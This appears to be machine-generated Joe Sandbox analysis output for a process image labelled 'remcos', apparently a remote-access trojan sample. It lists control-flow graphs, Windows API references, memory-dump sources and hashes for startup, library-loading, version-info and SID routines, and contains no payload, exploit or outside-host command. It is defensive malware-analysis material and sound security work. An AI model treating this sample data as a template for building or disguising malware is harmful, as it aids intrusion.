                                                                control_flow_graph 544 389330-389361 call 389e35 call 389ee8 GetStartupInfoW 550 389363-389372 544->550 551 38938c-38938e 550->551 552 389374-389376 550->552 555 38938f-389395 551->555 553 389378-38937d 552->553 554 38937f-38938a Sleep 552->554 553->555 554->550 556 3893a1-3893a7 555->556 557 389397-38939f _amsg_exit 555->557 559 3893a9-3893c2 call 389519 556->559 560 3893d5 556->560 558 3893db-3893e1 557->558 561 3893fe-389400 558->561 562 3893e3-3893f4 _initterm 558->562 559->558 567 3893c4-3893d0 559->567 560->558 565 38940b-389412 561->565 566 389402-389409 561->566 562->561 568 389414-389421 call 389d40 565->568 569 389437-389441 565->569 566->565 571 389509-389518 567->571 568->569 578 389423-389435 568->578 570 389444-389449 569->570 573 38944b-38944d 570->573 574 389495-389498 570->574 576 38944f-389451 573->576 577 389464-389468 573->577 579 38949a-3894a3 574->579 580 3894a6-3894b3 _ismbblead 574->580 576->574 583 389453-389455 576->583 584 38946a-38946e 577->584 585 389470-389472 577->585 578->569 579->580 581 3894b9-3894bd 580->581 582 3894b5-3894b6 580->582 581->570 582->581 583->577 586 389457-38945a 583->586 587 389473-38947b call 387d41 584->587 585->587 586->577 589 38945c-389462 586->589 591 389480-38948c 587->591 589->583 592 3894ee-3894f5 591->592 593 38948e-38948f exit 591->593 594 389502 592->594 595 3894f7-3894fd _cexit 592->595 593->574 594->571 595->594
                                                                APIs
                                                                  • Part of subcall function 00389E35: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00389E62
                                                                  • Part of subcall function 00389E35: GetCurrentProcessId.KERNEL32 ref: 00389E71
                                                                  • Part of subcall function 00389E35: GetCurrentThreadId.KERNEL32 ref: 00389E7A
                                                                  • Part of subcall function 00389E35: GetTickCount.KERNEL32 ref: 00389E83
                                                                  • Part of subcall function 00389E35: QueryPerformanceCounter.KERNEL32(?), ref: 00389E98
                                                                • GetStartupInfoW.KERNEL32(?,0038A310,00000058), ref: 0038934F
                                                                • Sleep.KERNEL32(000003E8), ref: 00389384
                                                                • _amsg_exit.MSVCRT ref: 00389399
                                                                • _initterm.MSVCRT ref: 003893ED
                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00389419
                                                                • exit.MSVCRT ref: 0038948F
                                                                • _ismbblead.MSVCRT ref: 003894AA
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                • String ID:
                                                                • API String ID: 836923961-0
                                                                • Opcode ID: e36377ccc17398166666426c940bb1745bda3524c9b02afb9f5084c9b1964f6e
                                                                • Instruction ID: f3b5ba5db7dd0d6b0575206153cf21bd73b0e190ae75f0cb87b660be3b56c789
                                                                • Opcode Fuzzy Hash: e36377ccc17398166666426c940bb1745bda3524c9b02afb9f5084c9b1964f6e
                                                                • Instruction Fuzzy Hash: 3941D575944314DFEB23FFA5DC157B977A9AB48760F2940DBEA42D72D0CB7088018B50
                                                                Function 0038915B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 100libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 596 38915b-389194 call 3890e9 599 3891c4-3891d8 596->599 600 389196-3891bf LdrResolveDelayLoadedAPI 596->600 601 3891da 599->601 602 3891dd-3891df 599->602 609 389267-38926b 600->609 601->602 604 38924d-389256 GetProcAddress 602->604 605 3891e1-3891ee LoadLibraryExA 602->605 606 38925f-389261 DelayLoadFailureHook 604->606 608 389258-38925d 604->608 605->606 607 3891f0-389200 605->607 606->609 610 389240-389246 FreeLibrary 607->610 611 389202-38922b 607->611 608->609 612 389249-38924b 610->612 611->612 613 38922d-38923e 611->613 612->604 612->606 613->612
                                                                APIs
                                                                • LdrResolveDelayLoadedAPI.NTDLL ref: 003891BD
                                                                • LoadLibraryExA.KERNEL32(?), ref: 003891E4
                                                                • GetProcAddress.KERNEL32(?,?), ref: 0038924F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressDelayLibraryLoadLoadedProcResolve
                                                                • String ID: $
                                                                • API String ID: 570722585-3993045852
                                                                • Opcode ID: bdaad498d193ab6fd9aa5ef411cfdd7aa43596721333609fb9de55c108dd4335
                                                                • Instruction ID: af9adeced1704559446249ac4e5a7bc6bdd93cdb8d4bd264863f4592afbb19a7
                                                                • Opcode Fuzzy Hash: bdaad498d193ab6fd9aa5ef411cfdd7aa43596721333609fb9de55c108dd4335
                                                                • Instruction Fuzzy Hash: 5B315571900319EFCF16DFA9C844BAEBBB9EF48754F18849AE805EB250D7319D01CB90
                                                                Function 003843A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 187memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 616 3843a0-3843ea call 38a18c call 38878a 621 3845aa-3845d4 call 3887d4 * 2 616->621 622 3843f0-3843ff call 38878a 616->622 622->621 628 384405-384444 call 38878a 622->628 633 38444a-38445f GetModuleFileNameW 628->633 634 38459f-3845a5 call 3887d4 628->634 633->634 635 384465-3844c8 call 388c90 633->635 634->621 635->634 640 3844ce-3844db 635->640 641 3844dd-3844f4 GlobalAlloc 640->641 642 3844f6-3844f9 640->642 643 3844ff-384501 641->643 642->643 644 384658-38465a 643->644 645 384507-38450c 643->645 648 384660-384661 644->648 649 384596-38459c 644->649 646 38451b-384541 call 388cd0 645->646 647 38450e-384515 GlobalFree 645->647 653 3845d5-3845d7 646->653 654 384547-38456f 646->654 647->646 650 384590 GlobalFree 648->650 649->634 650->649 655 3845d9-3845fe call 382e35 653->655 660 384588-38458b 654->660 662 384571-384578 654->662 655->660 661 384600-38462b call 382e35 655->661 660->649 664 38458d 660->664 667 384639-38463b 661->667 668 38462d-384637 661->668 662->660 665 38457a-384586 662->665 664->650 665->655 669 38463c-384653 667->669 668->667 668->669 669->660
                                                                APIs
                                                                  • Part of subcall function 0038878A: GlobalAlloc.KERNELBASE(00000040,00000000,00000000,00000001,00000000,?,00385E28,00000100), ref: 003887A2
                                                                  • Part of subcall function 0038878A: GlobalFree.KERNEL32(?), ref: 003887C0
                                                                • GetModuleFileNameW.KERNEL32(?,00000104,00000104,?,?,00001388,?,0038A2B0,000000A8,00386E7E,00000000,00000000,?), ref: 00384457
                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,?,00001388,?,0038A2B0,000000A8,00386E7E,00000000,00000000,?), ref: 003844E0
                                                                • GlobalFree.KERNEL32(?), ref: 0038450F
                                                                • GlobalFree.KERNEL32(?), ref: 00384590
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc$FileModuleName
                                                                • String ID: %d.%d.%.4d.%d
                                                                • API String ID: 906160587-3399825337
                                                                • Opcode ID: 2b7a9dff74466f2e2117a2ffdb38a98dfb85bebbf7ad8974294f6d516597ad07
                                                                • Instruction ID: c036fdcd921a6d939c096609a426425c0a9472b8d78f129d8515ad2b3843303a
                                                                • Opcode Fuzzy Hash: 2b7a9dff74466f2e2117a2ffdb38a98dfb85bebbf7ad8974294f6d516597ad07
                                                                • Instruction Fuzzy Hash: 417159B19003299FDF22EB64DD44BAEBBB9FF45310F1045E9A909A7691DB305E84CF11
                                                                Function 003844A9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 124memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 684 3844a9-3844c8 686 3844ce-3844db 684->686 687 38459f-3845d4 call 3887d4 * 3 684->687 689 3844dd-3844f4 GlobalAlloc 686->689 690 3844f6-3844f9 686->690 692 3844ff-384501 689->692 690->692 693 384658-38465a 692->693 694 384507-38450c 692->694 699 384660-384661 693->699 700 384596-38459c 693->700 696 38451b-384541 call 388cd0 694->696 697 38450e-384515 GlobalFree 694->697 706 3845d5-3845d7 696->706 707 384547-38456f 696->707 697->696 702 384590 GlobalFree 699->702 700->687 702->700 708 3845d9-3845fe call 382e35 706->708 713 384588-38458b 707->713 715 384571-384578 707->715 708->713 714 384600-38462b call 382e35 708->714 713->700 717 38458d 713->717 720 384639-38463b 714->720 721 38462d-384637 714->721 715->713 718 38457a-384586 715->718 717->702 718->708 722 38463c-384653 720->722 721->720 721->722 722->713
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,?,00001388,?,0038A2B0,000000A8,00386E7E,00000000,00000000,?), ref: 003844E0
                                                                • GlobalFree.KERNEL32(?), ref: 0038450F
                                                                • GlobalFree.KERNEL32(?), ref: 00384590
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Global$Free$Alloc
                                                                • String ID: %d.%d.%.4d.%d
                                                                • API String ID: 1780285237-3399825337
                                                                • Opcode ID: d94aec53bfb572e9c304f1e3bcdf486a74c0f46b5e06f41b62221325e12cc169
                                                                • Instruction ID: f094ad92033fa76acc6f3934000bb96ceb1a8fe4b4b5bb64485943577a006e30
                                                                • Opcode Fuzzy Hash: d94aec53bfb572e9c304f1e3bcdf486a74c0f46b5e06f41b62221325e12cc169
                                                                • Instruction Fuzzy Hash: 34416CB19003299FDB22EB64CC45BAEBBB9FB44310F2145E9E509A7691DB305E45CF10
                                                                Function 00388BFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52sleeplibraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 725 388bfd-388c19 726 388c1b 725->726 727 388c32-388c3e 725->727 728 388c1d-388c2d Sleep 726->728 729 388c60-388c64 727->729 730 388c40-388c42 727->730 728->728 733 388c2f 728->733 731 388c76-388c82 729->731 732 388c66-388c72 GetProcAddress 729->732 730->729 734 388c44-388c49 call 38908c 730->734 732->731 736 388c74 732->736 733->727 737 388c4e-388c5a 734->737 736->731 737->729
                                                                APIs
                                                                • Sleep.KERNEL32(0000000A), ref: 00388C1F
                                                                • GetProcAddress.KERNEL32(?), ref: 00388C68
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressProcSleep
                                                                • String ID: VERSION
                                                                • API String ID: 1175476452-2153328089
                                                                • Opcode ID: a25c8c6df7430085e6bf446f10cf1cb459de90ab8f4b61c8dddf6bcf138a6a55
                                                                • Instruction ID: 8374ccefe08b37fc5cb238297c3a80e4e38349d35083dafb49c77144a308c126
                                                                • Opcode Fuzzy Hash: a25c8c6df7430085e6bf446f10cf1cb459de90ab8f4b61c8dddf6bcf138a6a55
                                                                • Instruction Fuzzy Hash: 8801B1B16153109FDB1BFB399C19626BAE8DB81360F0504FEE541E7250EE70DC0187B0
                                                                Function 00388CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 751 388cd0-388ce6 call 388bfd 754 388d08 751->754 755 388ce8-388d06 GetFileVersionInfoW 751->755 756 388d0a-388d0b 754->756 755->756
                                                                APIs
                                                                  • Part of subcall function 00388BFD: Sleep.KERNEL32(0000000A), ref: 00388C1F
                                                                  • Part of subcall function 00388BFD: GetProcAddress.KERNEL32(?), ref: 00388C68
                                                                • GetFileVersionInfoW.KERNELBASE ref: 00388D03
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressFileInfoProcSleepVersion
                                                                • String ID: GetFileVersionInfoW
                                                                • API String ID: 3824450226-2839375084
                                                                • Opcode ID: ed9ac53703e5ea9796d52167a23ceb5f743604611c47173b0e3e20c4b8ca4b19
                                                                • Instruction ID: 529cbb8879070737d33b5a6842b80b1d2831d7b7e368982a9d66f74f9bef2cbc
                                                                • Opcode Fuzzy Hash: ed9ac53703e5ea9796d52167a23ceb5f743604611c47173b0e3e20c4b8ca4b19
                                                                • Instruction Fuzzy Hash: FFE04F7510031DA7CF136F929C0485B7F5AFB84360B1484A0B915421A1DB31D820A7A0
                                                                Function 00387D41 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00387D1B: SetProcessMitigationPolicy.KERNEL32(00000000,?,00000008,?,?,?,00387D64,0038A2D0,00000024,00389480,00380000,00000000,00000002,0000000A), ref: 00387D39
                                                                  • Part of subcall function 003863E3: GetVersionExW.KERNEL32(?), ref: 00386434
                                                                  • Part of subcall function 003863E3: GetCurrentProcess.KERNEL32(0000001A,?,00000004,00000000), ref: 00386456
                                                                  • Part of subcall function 003863E3: NtQueryInformationProcess.NTDLL ref: 0038645D
                                                                  • Part of subcall function 003863E3: GetCommandLineW.KERNEL32 ref: 0038649F
                                                                  • Part of subcall function 003863E3: GetStdHandle.KERNEL32(000000F5), ref: 003864F3
                                                                  • Part of subcall function 003863E3: GetFileType.KERNEL32(00000000), ref: 00386504
                                                                  • Part of subcall function 003863E3: memset.MSVCRT ref: 0038652B
                                                                  • Part of subcall function 003863E3: memset.MSVCRT ref: 0038653D
                                                                • ExitProcess.KERNEL32 ref: 00387DC9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Process$memset$CommandCurrentExitFileHandleInformationLineMitigationPolicyQueryTypeVersion
                                                                • String ID:
                                                                • API String ID: 3041573362-3916222277
                                                                • Opcode ID: 940ce5b102135d4b0cd47509b3d7968736f91a20921c9e82d060957bfd4f4b6b
                                                                • Instruction ID: f8bea25536abdb642952e87633dbfe970bf3ff3a7888c8d359a5bcbc6bdc458d
                                                                • Opcode Fuzzy Hash: 940ce5b102135d4b0cd47509b3d7968736f91a20921c9e82d060957bfd4f4b6b
                                                                • Instruction Fuzzy Hash: D7F0F871816308EBDF02FFA0DA497DCBBB9BF08315F204485E0017A1A1CB755E04DB61
                                                                Function 00388C90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 758 388c90-388ca6 call 388bfd 761 388ca8-388cc0 GetFileVersionInfoSizeW 758->761 762 388cc2 758->762 763 388cc4-388cc5 761->763 762->763
                                                                APIs
                                                                  • Part of subcall function 00388BFD: Sleep.KERNEL32(0000000A), ref: 00388C1F
                                                                  • Part of subcall function 00388BFD: GetProcAddress.KERNEL32(?), ref: 00388C68
                                                                • GetFileVersionInfoSizeW.KERNELBASE ref: 00388CBD
                                                                Strings
                                                                • GetFileVersionInfoSizeW, xrefs: 00388C9A
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressFileInfoProcSizeSleepVersion
                                                                • String ID: GetFileVersionInfoSizeW
                                                                • API String ID: 1244426142-1049618512
                                                                • Opcode ID: 19ee3c03eb4049345d898112c893cac79bc82583c82d702ddb42d66b5f50cf36
                                                                • Instruction ID: 3d8069c1f8492eb57f5a78938f9bfb0b6773dcd6c2ced66e91f2ca49b5f094a6
                                                                • Opcode Fuzzy Hash: 19ee3c03eb4049345d898112c893cac79bc82583c82d702ddb42d66b5f50cf36
                                                                • Instruction Fuzzy Hash: A7D01775640319678B177BA29C0485BBF6AEB84760B8480A1BC19973A2CF31ED11E7E0
                                                                Function 0038908C Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 765 38908c-3890ca memset call 389002 768 3890db 765->768 769 3890cc-3890d9 LoadLibraryW 765->769 770 3890dd-3890e8 call 3895e0 768->770 769->770
                                                                APIs
                                                                • memset.MSVCRT ref: 003890B2
                                                                  • Part of subcall function 00389002: lstrlenW.KERNEL32(OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003890C6,0000020A,?), ref: 00389019
                                                                • LoadLibraryW.KERNELBASE(?), ref: 003890D3
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoadlstrlenmemset
                                                                • String ID:
                                                                • API String ID: 3555077121-0
                                                                • Opcode ID: cb5ce0e9a9803b0ee71ccf230ad0c4372fe96bbffe80d8882511b1ee9c50bd10
                                                                • Instruction ID: 8bb5c5f97301126e40f15a0d47510b10f2a03e766c7784eb1e7f19ed67b7fec9
                                                                • Opcode Fuzzy Hash: cb5ce0e9a9803b0ee71ccf230ad0c4372fe96bbffe80d8882511b1ee9c50bd10
                                                                • Instruction Fuzzy Hash: 87F0E2B150430C9ADB26FB249C4ABEA73A8AB48700F5404DAE4159B1C0EAB0AE448B50
                                                                Function 0038878A Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 773 38878a-38879a 774 3887ac 773->774 775 38879c-3887aa GlobalAlloc 773->775 776 3887af-3887b1 774->776 775->776 777 3887b3-3887b5 776->777 778 3887b7-3887bc 776->778 779 3887cd-3887d1 777->779 780 3887be-3887c0 GlobalFree 778->780 781 3887c6-3887ca 778->781 780->781 781->779
                                                                APIs
                                                                • GlobalAlloc.KERNELBASE(00000040,00000000,00000000,00000001,00000000,?,00385E28,00000100), ref: 003887A2
                                                                • GlobalFree.KERNEL32(?), ref: 003887C0
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree
                                                                • String ID:
                                                                • API String ID: 3394109436-0
                                                                • Opcode ID: d6e74b425d006f4a7789f6dc3292c0270c0ff3b0542bd4137eefd86acd327d6b
                                                                • Instruction ID: a19f1daf9fce79bc8d71335c44ed7174fdb86ab537e5ffcc27d883d8ae9e1e40
                                                                • Opcode Fuzzy Hash: d6e74b425d006f4a7789f6dc3292c0270c0ff3b0542bd4137eefd86acd327d6b
                                                                • Instruction Fuzzy Hash: BFF08276000300AFD7229F45DC80DA2B7FDFF957A0BB1446EF99597640DB72A8069B60
                                                                Function 00387D1B Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 782 387d1b-387d40 SetProcessMitigationPolicy
                                                                APIs
                                                                • SetProcessMitigationPolicy.KERNEL32(00000000,?,00000008,?,?,?,00387D64,0038A2D0,00000024,00389480,00380000,00000000,00000002,0000000A), ref: 00387D39
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: MitigationPolicyProcess
                                                                • String ID:
                                                                • API String ID: 1088084561-0
                                                                • Opcode ID: ca9198298f1ff31ff672feaecc55c8eafa7893b9c9f25e2127c254b3ef764919
                                                                • Instruction ID: 2409da447f5641c302b3e84026177a7e3b0920ea569d9dfbfd6b41fdee704a55
                                                                • Opcode Fuzzy Hash: ca9198298f1ff31ff672feaecc55c8eafa7893b9c9f25e2127c254b3ef764919
                                                                • Instruction Fuzzy Hash: 69D09EB0514248BEEB48CB95D80EF9E7EACE744314F10419DA045D3281EAF16A459761
                                                                Function 00387DB7 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 783 387db7-387dc9 call 388f5a ExitProcess
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0
                                                                • Opcode ID: 9380b1fb1c76a7d31887c4afcbd3591bf31932003bfae692bb5d4ad35fb49133
                                                                • Instruction ID: e41e6183df0f39d8f4d2b042343295e436a88590b4f61c6f73256ded5b1ab55b
                                                                • Opcode Fuzzy Hash: 9380b1fb1c76a7d31887c4afcbd3591bf31932003bfae692bb5d4ad35fb49133
                                                                • Instruction Fuzzy Hash: 04B09B71C01305DBCF01AFA0DA0B08C7B31BF04321F1002C0D921321E0C7310D60DB61
                                                                Function 003887D4 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 787 3887d4-3887dd 788 3887df-3887e1 GlobalFree 787->788 789 3887e7-3887f4 787->789 788->789
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: FreeGlobal
                                                                • String ID:
                                                                • API String ID: 2979337801-0
                                                                • Opcode ID: 55fb2d095629be6393246347e4a73aa0aef0396f81e19164091463a30b782203
                                                                • Instruction ID: bfd1391beac78aa8569add5f4322a66145f37c331d9cc1627ddb1706f145d95b
                                                                • Opcode Fuzzy Hash: 55fb2d095629be6393246347e4a73aa0aef0396f81e19164091463a30b782203
                                                                • Instruction Fuzzy Hash: 93D01271011721CFD7319F14E508D82BBF4EF40728F22886EE4E983550D772E889CB40

                                                                Non-executed Functions

                                                                Function 003831A9 Relevance: 78.6, APIs: 52, Instructions: 599memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FreeSid.ADVAPI32(?), ref: 00383256
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383274
                                                                • FreeSid.ADVAPI32(?), ref: 00383292
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003832B0
                                                                • FreeSid.ADVAPI32(?), ref: 003832CE
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003832F0
                                                                • FreeSid.ADVAPI32(?), ref: 0038330E
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000013,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0038332C
                                                                • FreeSid.ADVAPI32(?), ref: 0038334A
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000014,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00383368
                                                                • FreeSid.ADVAPI32(?), ref: 003833CF
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003833EC
                                                                • FreeSid.ADVAPI32(?), ref: 0038340A
